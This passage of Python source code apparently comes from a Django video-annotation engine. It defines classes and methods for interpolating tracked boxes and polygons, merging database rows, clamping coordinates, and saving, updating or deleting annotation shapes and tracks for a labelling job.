if box.frame in boxes:
boxes[box.frame].merge(box)
else:
boxes[box.frame] = box
self.frame = min(self.frame, path.frame)
self.stop_frame = max(self.stop_frame, path.stop_frame)
self.boxes = list(sorted(boxes.values(), key=lambda box: box.frame))
self._interpolated_boxes = []
def add_attribute(self, attr):
self.attributes.append(attr)
class _PolyPath:
def __init__(self, label, start_frame, stop_frame, group_id, shapes=None, client_id=None, attributes=None):
self.label = label
self.frame = start_frame
self.stop_frame = stop_frame
self.group_id = group_id
self.shapes = shapes if shapes else []
self.client_id = client_id
self.attributes = attributes if attributes else []
self._interpolated_shapes = [] # ???
def add_shape(self, shape):
self.shapes.append(shape)
def get_interpolated_shapes(self):
if not self._interpolated_shapes:
self._init_interpolated_shapes()
return self._interpolated_shapes
def _init_interpolated_shapes(self):
assert self.shapes[-1].frame <= self.stop_frame
self._interpolated_shapes = []
shapes = {shape.frame: shape for shape in self.shapes}
outside = False
attributes = {}
for frame in range(self.frame, self.stop_frame + 1):
if frame in shapes:
for attr in shapes[frame].attributes:
attributes[attr.id] = attr
shape = _InterpolatedPolyShape(shapes[frame].points, frame,
shapes[frame].occluded, shapes[frame].z_order, shapes[frame].outside, True, list(attributes.values()))
outside = shape.outside
self._interpolated_shapes.append(shape)
elif not outside:
shape = _InterpolatedPolyShape(self._interpolated_shapes[-1].points, frame, False,
0, True, True, list(attributes.values()))
outside = shape.outside
self._interpolated_shapes.append(shape)
def merge(self, path):
pass
def add_attribute(self, attr):
self.attributes.append(attr)
class _Annotation:
def __init__(self, start_frame, stop_frame):
self.start_frame = start_frame
self.stop_frame = stop_frame
self.reset()
def reset(self):
self.boxes = []
self.box_paths = []
self.polygons = []
self.polygon_paths = []
self.polylines = []
self.polyline_paths = []
self.points = []
self.points_paths = []
def has_data(self):
non_empty = False
for attr in ['boxes', 'box_paths', 'polygons', 'polygon_paths',
'polylines', 'polyline_paths', 'points', 'points_paths']:
non_empty |= bool(getattr(self, attr))
return non_empty
# Functions below used by dump functionality
def to_boxes(self):
boxes = []
for path in self.box_paths:
for box in path.get_interpolated_boxes():
if not box.outside:
box = _LabeledBox(
label=path.label,
x0=box.xtl, y0=box.ytl, x1=box.xbr, y1=box.ybr,
frame=box.frame,
group_id=path.group_id,
occluded=box.occluded,
z_order=box.z_order,
attributes=box.attributes + path.attributes,
)
boxes.append(box)
return self.boxes + boxes
def _to_poly_shapes(self, iter_attr_name):
shapes = []
for path in getattr(self, iter_attr_name):
for shape in path.get_interpolated_shapes():
if not shape.outside:
shape = _LabeledPolyShape(
label=path.label,
points=shape.points,
frame=shape.frame,
group_id=path.group_id,
occluded=shape.occluded,
z_order=shape.z_order,
attributes=shape.attributes + path.attributes,
)
shapes.append(shape)
return shapes
def to_polygons(self):
polygons = self._to_poly_shapes('polygon_paths')
return polygons + self.polygons
def to_polylines(self):
polylines = self._to_poly_shapes('polyline_paths')
return polylines + self.polylines
def to_points(self):
points = self._to_poly_shapes('points_paths')
return points + self.points
def to_box_paths(self):
paths = []
for box in self.boxes:
box0 = _InterpolatedBox(box.xtl, box.ytl, box.xbr, box.ybr, box.frame,
box.occluded, box.z_order, False, True)
box1 = copy.copy(box0)
box1.outside = True
box1.frame += 1
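            # A plain box becomes a two-keyframe track: visible at its own frame,
            # marked outside one frame later.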
path = _BoxPath(
label=box.label,
start_frame=box.frame,
stop_frame=box.frame + 1,
group_id=box.group_id,
boxes=[box0, box1],
attributes=box.attributes,
client_id=box.client_id,
)
paths.append(path)
return self.box_paths + paths
def _to_poly_paths(self, iter_attr_name):
paths = []
for shape in getattr(self, iter_attr_name):
shape0 = _InterpolatedPolyShape(shape.points, shape.frame, shape.occluded, shape.z_order, False, True)
shape1 = copy.copy(shape0)
shape1.outside = True
shape1.frame += 1
path = _PolyPath(
label=shape.label,
start_frame=shape.frame,
stop_frame=shape.frame + 1,
group_id=shape.group_id,
shapes=[shape0, shape1],
client_id=shape.client_id,
attributes=shape.attributes,
)
paths.append(path)
return paths
def to_polygon_paths(self):
return self._to_poly_paths('polygons') + self.polygon_paths
def to_polyline_paths(self):
return self._to_poly_paths('polylines') + self.polyline_paths
def to_points_paths(self):
return self._to_poly_paths('points') + self.points_paths
def bulk_create(db_model, objects, flt_param = {}):
if objects:
if flt_param:
if 'postgresql' in settings.DATABASES["default"]["ENGINE"]:
return db_model.objects.bulk_create(objects)
else:
ids = list(db_model.objects.filter(**flt_param).values_list('id', flat=True))
db_model.objects.bulk_create(objects)
return list(db_model.objects.exclude(id__in=ids).filter(**flt_param))
else:
return db_model.objects.bulk_create(objects)
class _AnnotationForJob(_Annotation):
def __init__(self, db_job):
db_segment = db_job.segment
super().__init__(db_segment.start_frame, db_segment.stop_frame)
# pylint: disable=bad-continuation
self.db_job = db_job
self.logger = slogger.job[db_job.id]
self.db_labels = {db_label.id:db_label
for db_label in db_job.segment.task.label_set.all()}
self.db_attributes = {db_attr.id:db_attr
for db_attr in models.AttributeSpec.objects.filter(
label__task__id=db_job.segment.task.id)}
def _get_client_ids_from_db(self):
client_ids = set()
ids = list(self.db_job.objectpath_set.values_list('client_id', flat=True))
client_ids.update(ids)
for shape_type in ['polygons', 'polylines', 'points', 'boxes']:
ids = list(self._get_shape_class(shape_type).objects.filter(
job_id=self.db_job.id).values_list('client_id', flat=True))
client_ids.update(ids)
return client_ids
def _merge_table_rows(self, rows, keys_for_merge, field_id):
"""dot.notation access to dictionary attributes"""
class dotdict(OrderedDict):
__getattr__ = OrderedDict.get
__setattr__ = OrderedDict.__setitem__
__delattr__ = OrderedDict.__delitem__
__eq__ = lambda self, other: self.id == other.id
__hash__ = lambda self: self.id
# It is necessary to keep a stable order of original rows
# (e.g. for tracked boxes). Otherwise prev_box.frame can be bigger
# than next_box.frame.
merged_rows = OrderedDict()
# Group all rows by field_id. In grouped rows replace fields in
# accordance with keys_for_merge structure.
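        # For example (hypothetical rows): two flattened rows sharing id=7 but
        # carrying different labeledboxattributeval__id values collapse into a
        # single merged row whose 'attributes' list holds both entries.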
for row in rows:
row_id = row[field_id]
if not row_id in merged_rows:
merged_rows[row_id] = dotdict(row)
for key in keys_for_merge:
merged_rows[row_id][key] = []
for key in keys_for_merge:
item = dotdict({v.split('__', 1)[-1]:row[v] for v in keys_for_merge[key]})
if item.id:
merged_rows[row_id][key].append(item)
# Remove redundant keys from final objects
redundant_keys = [item for values in keys_for_merge.values() for item in values]
for i in merged_rows:
for j in redundant_keys:
del merged_rows[i][j]
return list(merged_rows.values())
@staticmethod
def _clamp(value, min_value, max_value):
return max(min(value, max_value), min_value)
def _clamp_box(self, xtl, ytl, xbr, ybr, im_size):
xtl = self._clamp(xtl, 0, im_size['width'])
xbr = self._clamp(xbr, 0, im_size['width'])
ytl = self._clamp(ytl, 0, im_size['height'])
ybr = self._clamp(ybr, 0, im_size['height'])
return xtl, ytl, xbr, ybr
def _clamp_poly(self, points, im_size):
verified = []
points = points.split(' ')
for p in points:
p = p.split(',')
verified.append('{},{}'.format(
self._clamp(float(p[0]), 0, im_size['width']),
self._clamp(float(p[1]), 0, im_size['height'])
))
return ' '.join(verified)
def init_from_db(self):
def get_values(shape_type):
if shape_type == 'polygons':
return [
('id', 'frame', 'points', 'label_id', 'group_id', 'occluded', 'z_order', 'client_id',
'labeledpolygonattributeval__value', 'labeledpolygonattributeval__spec_id',
'labeledpolygonattributeval__id'), {
'attributes': [
'labeledpolygonattributeval__value',
'labeledpolygonattributeval__spec_id',
'labeledpolygonattributeval__id'
]
}, 'labeledpolygonattributeval_set'
]
elif shape_type == 'polylines':
return [
('id', 'frame', 'points', 'label_id', 'group_id', 'occluded', 'z_order', 'client_id',
'labeledpolylineattributeval__value', 'labeledpolylineattributeval__spec_id',
'labeledpolylineattributeval__id'), {
'attributes': [
'labeledpolylineattributeval__value',
'labeledpolylineattributeval__spec_id',
'labeledpolylineattributeval__id'
]
}, 'labeledpolylineattributeval_set'
]
elif shape_type == 'boxes':
return [
('id', 'frame', 'xtl', 'ytl', 'xbr', 'ybr', 'label_id', 'group_id', 'occluded', 'z_order', 'client_id',
'labeledboxattributeval__value', 'labeledboxattributeval__spec_id',
'labeledboxattributeval__id'), {
'attributes': [
'labeledboxattributeval__value',
'labeledboxattributeval__spec_id',
'labeledboxattributeval__id'
]
}, 'labeledboxattributeval_set'
]
elif shape_type == 'points':
return [
('id', 'frame', 'points', 'label_id', 'group_id', 'occluded', 'z_order', 'client_id',
'labeledpointsattributeval__value', 'labeledpointsattributeval__spec_id',
'labeledpointsattributeval__id'), {
'attributes': [
'labeledpointsattributeval__value',
'labeledpointsattributeval__spec_id',
'labeledpointsattributeval__id'
]
}, 'labeledpointsattributeval_set'
]
self.reset()
for shape_type in ['boxes', 'points', 'polygons', 'polylines']:
(values, merge_keys, prefetch) = get_values(shape_type)
db_shapes = list(self._get_shape_set(shape_type).prefetch_related(prefetch).
values(*values).order_by('frame'))
db_shapes = self._merge_table_rows(db_shapes, merge_keys, 'id')
for db_shape in db_shapes:
label = _Label(self.db_labels[db_shape.label_id])
if shape_type == 'boxes':
shape = _LabeledBox(label=label,
x0=db_shape.xtl, y0=db_shape.ytl, x1=db_shape.xbr, y1=db_shape.ybr,
frame=db_shape.frame,
group_id=db_shape.group_id,
occluded=db_shape.occluded,
z_order=db_shape.z_order,
client_id=db_shape.client_id,
)
else:
shape = _LabeledPolyShape(
label=label,
points=db_shape.points,
frame=db_shape.frame,
group_id=db_shape.group_id,
occluded=db_shape.occluded,
z_order=db_shape.z_order,
client_id=db_shape.client_id,
)
for db_attr in db_shape.attributes:
if db_attr.id != None:
spec = self.db_attributes[db_attr.spec_id]
attr = _Attribute(spec, db_attr.value)
shape.add_attribute(attr)
getattr(self, shape_type).append(shape)
        db_paths = self.db_job.objectpath_set
        # prefetch_related returns a new queryset, so the result must be reassigned.
        for shape in ['trackedpoints_set', 'trackedbox_set', 'trackedpolyline_set', 'trackedpolygon_set']:
            db_paths = db_paths.prefetch_related(shape)
        for shape_attr in ['trackedpoints_set__trackedpointsattributeval_set', 'trackedbox_set__trackedboxattributeval_set',
                           'trackedpolygon_set__trackedpolygonattributeval_set', 'trackedpolyline_set__trackedpolylineattributeval_set']:
            db_paths = db_paths.prefetch_related(shape_attr)
        db_paths = db_paths.prefetch_related('objectpathattributeval_set')
db_paths = list (db_paths.values('id', 'frame', 'group_id', 'shapes', 'client_id', 'objectpathattributeval__spec_id',
'objectpathattributeval__id', 'objectpathattributeval__value',
'trackedbox', 'trackedpolygon', 'trackedpolyline', 'trackedpoints',
'trackedbox__id', 'label_id', 'trackedbox__xtl', 'trackedbox__ytl',
'trackedbox__xbr', 'trackedbox__ybr', 'trackedbox__frame', 'trackedbox__occluded',
'trackedbox__z_order','trackedbox__outside', 'trackedbox__trackedboxattributeval__spec_id',
'trackedbox__trackedboxattributeval__value', 'trackedbox__trackedboxattributeval__id',
'trackedpolygon__id' ,'trackedpolygon__points', 'trackedpolygon__frame', 'trackedpolygon__occluded',
'trackedpolygon__z_order', 'trackedpolygon__outside', 'trackedpolygon__trackedpolygonattributeval__spec_id',
'trackedpolygon__trackedpolygonattributeval__value', 'trackedpolygon__trackedpolygonattributeval__id',
'trackedpolyline__id', 'trackedpolyline__points', 'trackedpolyline__frame', 'trackedpolyline__occluded',
'trackedpolyline__z_order', 'trackedpolyline__outside', 'trackedpolyline__trackedpolylineattributeval__spec_id',
'trackedpolyline__trackedpolylineattributeval__value', 'trackedpolyline__trackedpolylineattributeval__id',
'trackedpoints__id', 'trackedpoints__points', 'trackedpoints__frame', 'trackedpoints__occluded',
'trackedpoints__z_order', 'trackedpoints__outside', 'trackedpoints__trackedpointsattributeval__spec_id',
'trackedpoints__trackedpointsattributeval__value', 'trackedpoints__trackedpointsattributeval__id')
.order_by('id', 'trackedbox__frame', 'trackedpolygon__frame', 'trackedpolyline__frame', 'trackedpoints__frame'))
db_box_paths = list(filter(lambda path: path['shapes'] == 'boxes', db_paths ))
db_polygon_paths = list(filter(lambda path: path['shapes'] == 'polygons', db_paths ))
db_polyline_paths = list(filter(lambda path: path['shapes'] == 'polylines', db_paths ))
db_points_paths = list(filter(lambda path: path['shapes'] == 'points', db_paths ))
object_path_attr_merge_key = [
'objectpathattributeval__value',
'objectpathattributeval__spec_id',
'objectpathattributeval__id'
]
db_box_paths = self._merge_table_rows(db_box_paths, {
'attributes': object_path_attr_merge_key,
'shapes': [
'trackedbox__id', 'trackedbox__xtl', 'trackedbox__ytl',
'trackedbox__xbr', 'trackedbox__ybr', 'trackedbox__frame',
'trackedbox__occluded', 'trackedbox__z_order', 'trackedbox__outside',
'trackedbox__trackedboxattributeval__value',
'trackedbox__trackedboxattributeval__spec_id',
'trackedbox__trackedboxattributeval__id'
],
}, 'id')
db_polygon_paths = self._merge_table_rows(db_polygon_paths, {
'attributes': object_path_attr_merge_key,
'shapes': [
'trackedpolygon__id', 'trackedpolygon__points', 'trackedpolygon__frame',
'trackedpolygon__occluded', 'trackedpolygon__z_order', 'trackedpolygon__outside',
'trackedpolygon__trackedpolygonattributeval__value',
'trackedpolygon__trackedpolygonattributeval__spec_id',
'trackedpolygon__trackedpolygonattributeval__id'
]
}, 'id')
db_polyline_paths = self._merge_table_rows(db_polyline_paths, {
'attributes': object_path_attr_merge_key,
'shapes': [
'trackedpolyline__id', 'trackedpolyline__points', 'trackedpolyline__frame',
'trackedpolyline__occluded', 'trackedpolyline__z_order', 'trackedpolyline__outside',
'trackedpolyline__trackedpolylineattributeval__value',
'trackedpolyline__trackedpolylineattributeval__spec_id',
'trackedpolyline__trackedpolylineattributeval__id'
],
}, 'id')
db_points_paths = self._merge_table_rows(db_points_paths, {
'attributes': object_path_attr_merge_key,
'shapes': [
'trackedpoints__id', 'trackedpoints__points', 'trackedpoints__frame',
'trackedpoints__occluded', 'trackedpoints__z_order', 'trackedpoints__outside',
'trackedpoints__trackedpointsattributeval__value',
'trackedpoints__trackedpointsattributeval__spec_id',
'trackedpoints__trackedpointsattributeval__id'
]
}, 'id')
for db_box_path in db_box_paths:
db_box_path.attributes = list(set(db_box_path.attributes))
db_box_path.shapes = self._merge_table_rows(db_box_path.shapes, {
'attributes': [
'trackedboxattributeval__value',
'trackedboxattributeval__spec_id',
'trackedboxattributeval__id'
]
}, 'id')
for db_polygon_path in db_polygon_paths:
db_polygon_path.attributes = list(set(db_polygon_path.attributes))
db_polygon_path.shapes = self._merge_table_rows(db_polygon_path.shapes, {
'attributes': [
'trackedpolygonattributeval__value',
'trackedpolygonattributeval__spec_id',
'trackedpolygonattributeval__id'
]
}, 'id')
for db_polyline_path in db_polyline_paths:
db_polyline_path.attributes = list(set(db_polyline_path.attributes))
db_polyline_path.shapes = self._merge_table_rows(db_polyline_path.shapes, {
'attributes': [
'trackedpolylineattributeval__value',
'trackedpolylineattributeval__spec_id',
'trackedpolylineattributeval__id'
]
}, 'id')
for db_points_path in db_points_paths:
db_points_path.attributes = list(set(db_points_path.attributes))
db_points_path.shapes = self._merge_table_rows(db_points_path.shapes, {
'attributes': [
'trackedpointsattributeval__value',
'trackedpointsattributeval__spec_id',
'trackedpointsattributeval__id'
]
}, 'id')
for db_path in db_box_paths:
for db_shape in db_path.shapes:
db_shape.attributes = list(set(db_shape.attributes))
label = _Label(self.db_labels[db_path.label_id])
path = _BoxPath(
label=label,
start_frame=db_path.frame,
stop_frame=self.stop_frame,
group_id=db_path.group_id,
client_id=db_path.client_id,
)
for db_attr in db_path.attributes:
spec = self.db_attributes[db_attr.spec_id]
attr = _Attribute(spec, db_attr.value)
path.add_attribute(attr)
frame = -1
for db_shape in db_path.shapes:
box = _TrackedBox(
x0=db_shape.xtl, y0=db_shape.ytl, x1=db_shape.xbr, y1=db_shape.ybr,
frame=db_shape.frame,
occluded=db_shape.occluded,
z_order=db_shape.z_order,
outside=db_shape.outside,
)
assert box.frame > frame
frame = box.frame
for db_attr in db_shape.attributes:
spec = self.db_attributes[db_attr.spec_id]
attr = _Attribute(spec, db_attr.value)
box.add_attribute(attr)
path.add_box(box)
self.box_paths.append(path)
for idx, paths_type in enumerate(['polygon_paths', 'polyline_paths', 'points_paths']):
source = [db_polygon_paths, db_polyline_paths, db_points_paths][idx]
for db_path in source:
for db_shape in db_path.shapes:
db_shape.attributes = list(set(db_shape.attributes))
label = _Label(self.db_labels[db_path.label_id])
path = _PolyPath(
label=label,
start_frame=db_path.frame,
stop_frame=self.stop_frame,
group_id=db_path.group_id,
client_id=db_path.client_id,
)
for db_attr in db_path.attributes:
spec = self.db_attributes[db_attr.spec_id]
attr = _Attribute(spec, db_attr.value)
path.add_attribute(attr)
frame = -1
for db_shape in db_path.shapes:
shape = _TrackedPolyShape(
points=db_shape.points,
frame=db_shape.frame,
occluded=db_shape.occluded,
z_order=db_shape.z_order,
outside=db_shape.outside,
)
assert shape.frame > frame
frame = shape.frame
for db_attr in db_shape.attributes:
spec = self.db_attributes[db_attr.spec_id]
attr = _Attribute(spec, db_attr.value)
shape.add_attribute(attr)
path.add_shape(shape)
getattr(self, paths_type).append(path)
def init_from_client(self, data):
# All fields inside data should be converted to the correct type explicitly.
# We cannot trust the client to send 23 as an integer; here we also
# accept "23".
db_task = self.db_job.segment.task
image_meta = get_image_meta_cache(db_task)
self.reset()
for box in data['boxes']:
label = _Label(self.db_labels[int(box['label_id'])])
frame_idx = int(box['frame']) if db_task.mode == 'annotation' else 0
xtl, ytl, xbr, ybr = self._clamp_box(float(box['xtl']), float(box['ytl']),
float(box['xbr']), float(box['ybr']),
image_meta['original_size'][frame_idx])
labeled_box = _LabeledBox(
label=label,
x0=xtl, y0=ytl, x1=xbr, y1=ybr,
frame=int(box['frame']),
group_id=int(box['group_id']),
occluded=strtobool(str(box['occluded'])),
z_order=int(box['z_order']),
client_id=int(box['id']),
)
for attr in box['attributes']:
spec = self.db_attributes[int(attr['id'])]
attr = _Attribute(spec, str(attr['value']))
labeled_box.add_attribute(attr)
self.boxes.append(labeled_box)
for poly_shape_type in ['points', 'polygons', 'polylines']:
for poly_shape in data[poly_shape_type]:
label = _Label(self.db_labels[int(poly_shape['label_id'])])
frame_idx = int(poly_shape['frame']) if db_task.mode == 'annotation' else 0
points = self._clamp_poly(poly_shape['points'], image_meta['original_size'][frame_idx])
labeled_poly_shape = _LabeledPolyShape(
label=label,
points=points,
frame=int(poly_shape['frame']),
group_id=int(poly_shape['group_id']),
occluded=strtobool(str(poly_shape['occluded'])),
z_order=int(poly_shape['z_order']),
client_id=int(poly_shape['id']),
)
for attr in poly_shape['attributes']:
spec = self.db_attributes[int(attr['id'])]
attr = _Attribute(spec, str(attr['value']))
labeled_poly_shape.add_attribute(attr)
getattr(self, poly_shape_type).append(labeled_poly_shape)
for path in data['box_paths']:
label = _Label(self.db_labels[int(path['label_id'])])
boxes = []
frame = -1
has_boxes_on_prev_segm = False
last_box_on_prev_segm = None
has_box_on_start_frame = False
for box in path['shapes']:
if int(box['frame']) < self.start_frame:
has_boxes_on_prev_segm = True
if last_box_on_prev_segm is None or int(last_box_on_prev_segm["frame"]) < int(box["frame"]):
last_box_on_prev_segm = box
elif int(box['frame']) == self.start_frame:
has_box_on_start_frame = True
break
if has_boxes_on_prev_segm and not has_box_on_start_frame:
last_box_on_prev_segm["frame"] = self.start_frame
for box in path['shapes']:
if int(box['frame']) <= self.stop_frame and int(box['frame']) >= self.start_frame:
frame_idx = int(box['frame']) if db_task.mode == 'annotation' else 0
xtl, ytl, xbr, ybr = self._clamp_box(float(box['xtl']), float(box['ytl']),
float(box['xbr']), float(box['ybr']), image_meta['original_size'][frame_idx])
tracked_box = _TrackedBox(
x0=xtl, y0=ytl, x1=xbr, y1=ybr,
frame=int(box['frame']),
occluded=strtobool(str(box['occluded'])),
z_order=int(box['z_order']),
outside=strtobool(str(box['outside'])),
)
assert tracked_box.frame > frame
frame = tracked_box.frame
for attr in box['attributes']:
spec = self.db_attributes[int(attr['id'])]
assert spec.is_mutable()
attr = _Attribute(spec, str(attr['value']))
tracked_box.add_attribute(attr)
boxes.append(tracked_box)
else:
self.logger.error("init_from_client: ignore frame #%d " +
"because it out of segment range [%d-%d]", int(box['frame']), self.start_frame, self.stop_frame)
attributes = []
for attr in path['attributes']:
spec = self.db_attributes[int(attr['id'])]
assert not spec.is_mutable()
attr = _Attribute(spec, str(attr['value']))
attributes.append(attr)
assert frame <= self.stop_frame
box_path = _BoxPath(label=label,
start_frame=min(list(map(lambda box: box.frame, boxes))),
stop_frame=self.stop_frame,
group_id=int(path['group_id']),
boxes=boxes,
client_id=int(path['id']),
attributes=attributes,
)
self.box_paths.append(box_path)
for poly_path_type in ['points_paths', 'polygon_paths', 'polyline_paths']:
for path in data[poly_path_type]:
label = _Label(self.db_labels[int(path['label_id'])])
poly_shapes = []
frame = -1
has_shapes_on_prev_segm = False
last_shape_on_prev_segm = None
has_shape_on_start_frame = False
for poly_shape in path['shapes']:
if int(poly_shape['frame']) < self.start_frame:
has_shapes_on_prev_segm = True
if last_shape_on_prev_segm is None or int(last_shape_on_prev_segm["frame"]) < int(poly_shape["frame"]):
last_shape_on_prev_segm = poly_shape
elif int(poly_shape['frame']) == self.start_frame:
has_shape_on_start_frame = True
break
if has_shapes_on_prev_segm and not has_shape_on_start_frame:
last_shape_on_prev_segm["frame"] = self.start_frame
for poly_shape in path['shapes']:
if int(poly_shape['frame']) <= self.stop_frame and int(poly_shape['frame']) >= self.start_frame:
frame_idx = int(poly_shape['frame']) if db_task.mode == 'annotation' else 0
points = self._clamp_poly(poly_shape['points'], image_meta['original_size'][frame_idx])
tracked_poly_shape = _TrackedPolyShape(
points=points,
frame=int(poly_shape['frame']),
occluded=strtobool(str(poly_shape['occluded'])),
z_order=int(poly_shape['z_order']),
outside=strtobool(str(poly_shape['outside'])),
)
assert tracked_poly_shape.frame > frame
frame = tracked_poly_shape.frame
for attr in poly_shape['attributes']:
spec = self.db_attributes[int(attr['id'])]
assert spec.is_mutable()
attr = _Attribute(spec, str(attr['value']))
tracked_poly_shape.add_attribute(attr)
poly_shapes.append(tracked_poly_shape)
else:
self.logger.error("init_from_client: ignore frame #%d " +
"because it out of segment range [%d-%d]", int(poly_shape['frame']), self.start_frame, self.stop_frame)
attributes = []
for attr in path['attributes']:
spec = self.db_attributes[int(attr['id'])]
assert not spec.is_mutable()
attr = _Attribute(spec, str(attr['value']))
attributes.append(attr)
poly_path = _PolyPath(
label=label,
start_frame=min(list(map(lambda shape: shape.frame, poly_shapes))),
stop_frame=self.stop_frame + 1,
group_id=int(path['group_id']),
shapes=poly_shapes,
client_id=int(path['id']),
attributes=attributes,
)
getattr(self, poly_path_type).append(poly_path)
return self.has_data()
def _get_shape_class(self, shape_type):
if shape_type == 'polygons':
return models.LabeledPolygon
elif shape_type == 'polylines':
return models.LabeledPolyline
elif shape_type == 'boxes':
return models.LabeledBox
elif shape_type == 'points':
return models.LabeledPoints
elif shape_type == 'polygon_paths':
return models.TrackedPolygon
elif shape_type == 'polyline_paths':
return models.TrackedPolyline
elif shape_type == 'box_paths':
return models.TrackedBox
elif shape_type == 'points_paths':
return models.TrackedPoints
def _get_shape_attr_class(self, shape_type):
if shape_type == 'polygons':
return models.LabeledPolygonAttributeVal
elif shape_type == 'polylines':
return models.LabeledPolylineAttributeVal
elif shape_type == 'boxes':
return models.LabeledBoxAttributeVal
elif shape_type == 'points':
return models.LabeledPointsAttributeVal
elif shape_type == 'polygon_paths':
return models.TrackedPolygonAttributeVal
elif shape_type == 'polyline_paths':
return models.TrackedPolylineAttributeVal
elif shape_type == 'box_paths':
return models.TrackedBoxAttributeVal
elif shape_type == 'points_paths':
return models.TrackedPointsAttributeVal
def _save_paths_to_db(self):
for shape_type in ['polygon_paths', 'polyline_paths', 'points_paths', 'box_paths']:
db_paths = []
db_path_attrvals = []
db_shapes = []
db_shape_attrvals = []
shapes = getattr(self, shape_type)
for path in shapes:
db_path = models.ObjectPath()
db_path.job = self.db_job
db_path.label = self.db_labels[path.label.id]
db_path.frame = path.frame
db_path.group_id = path.group_id
db_path.client_id = path.client_id
if shape_type == 'polygon_paths':
db_path.shapes = 'polygons'
elif shape_type == 'polyline_paths':
db_path.shapes = 'polylines'
elif shape_type == 'box_paths':
db_path.shapes = 'boxes'
elif shape_type == 'points_paths':
db_path.shapes = 'points'
for attr in path.attributes:
db_attrspec = self.db_attributes[attr.id]
db_attrval = models.ObjectPathAttributeVal()
db_attrval.track_id = len(db_paths)
db_attrval.spec = db_attrspec
db_attrval.value = attr.value
db_path_attrvals.append(db_attrval)
path_shapes = path.boxes if hasattr(path, 'boxes') else path.shapes
for shape in path_shapes:
db_shape = self._get_shape_class(shape_type)()
db_shape.track_id = len(db_paths)
if shape_type == 'box_paths':
db_shape.xtl = shape.xtl
db_shape.ytl = shape.ytl
db_shape.xbr = shape.xbr
db_shape.ybr = shape.ybr
else:
db_shape.points = shape.points
db_shape.frame = shape.frame
db_shape.occluded = shape.occluded
db_shape.z_order = shape.z_order
db_shape.outside = shape.outside
for attr in shape.attributes:
db_attrspec = self.db_attributes[attr.id]
db_attrval = self._get_shape_attr_class(shape_type)()
if shape_type == 'polygon_paths':
db_attrval.polygon_id = len(db_shapes)
elif shape_type == 'polyline_paths':
db_attrval.polyline_id = len(db_shapes)
elif shape_type == 'box_paths':
db_attrval.box_id = len(db_shapes)
elif shape_type == 'points_paths':
db_attrval.points_id = len(db_shapes)
db_attrval.spec = db_attrspec
db_attrval.value = attr.value
db_shape_attrvals.append(db_attrval)
db_shapes.append(db_shape)
db_paths.append(db_path)
db_paths = bulk_create(models.ObjectPath, db_paths,
{"job_id": self.db_job.id})
for db_attrval in db_path_attrvals:
db_attrval.track_id = db_paths[db_attrval.track_id].id
bulk_create(models.ObjectPathAttributeVal, db_path_attrvals)
for db_shape in db_shapes:
db_shape.track_id = db_paths[db_shape.track_id].id
db_shapes = bulk_create(self._get_shape_class(shape_type), db_shapes,
{"track__job_id": self.db_job.id})
for db_attrval in db_shape_attrvals:
if shape_type == 'polygon_paths':
db_attrval.polygon_id = db_shapes[db_attrval.polygon_id].id
elif shape_type == 'polyline_paths':
db_attrval.polyline_id = db_shapes[db_attrval.polyline_id].id
elif shape_type == 'box_paths':
db_attrval.box_id = db_shapes[db_attrval.box_id].id
elif shape_type == 'points_paths':
db_attrval.points_id = db_shapes[db_attrval.points_id].id
bulk_create(self._get_shape_attr_class(shape_type), db_shape_attrvals)
def _get_shape_set(self, shape_type):
if shape_type == 'polygons':
return self.db_job.labeledpolygon_set
elif shape_type == 'polylines':
return self.db_job.labeledpolyline_set
elif shape_type == 'boxes':
return self.db_job.labeledbox_set
elif shape_type == 'points':
return self.db_job.labeledpoints_set
def _save_shapes_to_db(self):
for shape_type in ['polygons', 'polylines', 'points', 'boxes']:
db_shapes = []
db_attrvals = []
shapes = getattr(self, shape_type)
for shape in shapes:
db_shape = self._get_shape_class(shape_type)()
db_shape.job = self.db_job
db_shape.label = self.db_labels[shape.label.id]
db_shape.group_id = shape.group_id
db_shape.client_id = shape.client_id
if shape_type == 'boxes':
db_shape.xtl = shape.xtl
db_shape.ytl = shape.ytl
db_shape.xbr = shape.xbr
db_shape.ybr = shape.ybr
else:
db_shape.points = shape.points
db_shape.frame = shape.frame
db_shape.occluded = shape.occluded
db_shape.z_order = shape.z_order
for attr in shape.attributes:
db_attrval = self._get_shape_attr_class(shape_type)()
if shape_type == 'polygons':
db_attrval.polygon_id = len(db_shapes)
elif shape_type == 'polylines':
db_attrval.polyline_id = len(db_shapes)
elif shape_type == 'boxes':
db_attrval.box_id = len(db_shapes)
else:
db_attrval.points_id = len(db_shapes)
db_attrval.spec = self.db_attributes[attr.id]
db_attrval.value = attr.value
db_attrvals.append(db_attrval)
db_shapes.append(db_shape)
db_shapes = bulk_create(self._get_shape_class(shape_type), db_shapes,
{"job_id": self.db_job.id})
for db_attrval in db_attrvals:
if shape_type == 'polygons':
db_attrval.polygon_id = db_shapes[db_attrval.polygon_id].id
elif shape_type == 'polylines':
db_attrval.polyline_id = db_shapes[db_attrval.polyline_id].id
elif shape_type == 'boxes':
db_attrval.box_id = db_shapes[db_attrval.box_id].id
else:
db_attrval.points_id = db_shapes[db_attrval.points_id].id
bulk_create(self._get_shape_attr_class(shape_type), db_attrvals)
def _update_shapes_in_db(self):
client_ids_to_delete = {}
for shape_type in ['polygons', 'polylines', 'points', 'boxes']:
client_ids_to_delete[shape_type] = list(shape.client_id for shape in getattr(self, shape_type))
self._delete_shapes_from_db(client_ids_to_delete)
self._save_shapes_to_db()
def _update_paths_in_db(self):
client_ids_to_delete = {}
for shape_type in ['polygon_paths', 'polyline_paths', 'points_paths', 'box_paths']:
client_ids_to_delete[shape_type] = list(shape.client_id for shape in getattr(self, shape_type))
self._delete_paths_from_db(client_ids_to_delete)
self._save_paths_to_db()
def _delete_shapes_from_db(self, data):
for shape_type in ['polygons', 'polylines', 'points', 'boxes']:
client_ids_to_delete = data[shape_type]
deleted = self._get_shape_set(shape_type).filter(client_id__in=client_ids_to_delete).delete()
class_name = 'engine.{}'.format(self._get_shape_class(shape_type).__name__)
if not (deleted[0] == 0 and len(client_ids_to_delete) == 0) and (class_name in deleted[1] and deleted[1][class_name] != len(client_ids_to_delete)):
raise Exception('Number of deleted objects doesn\'t match the requested number')
def _delete_paths_from_db(self, data):
client_ids_to_delete = []
for shape_type in ['polygon_paths', 'polyline_paths', 'points_paths', 'box_paths']:
client_ids_to_delete.extend(data[shape_type])
deleted = self.db_job.objectpath_set.filter(client_id__in=client_ids_to_delete).delete()
class_name = 'engine.ObjectPath'
if not (deleted[0] == 0 and len(client_ids_to_delete) == 0) and \
(class_name in deleted[1] and deleted[1][class_name] != len(client_ids_to_delete)):
raise Exception('Number of deleted objects doesn\'t match the requested number')
def delete_all_shapes_from_db(self):
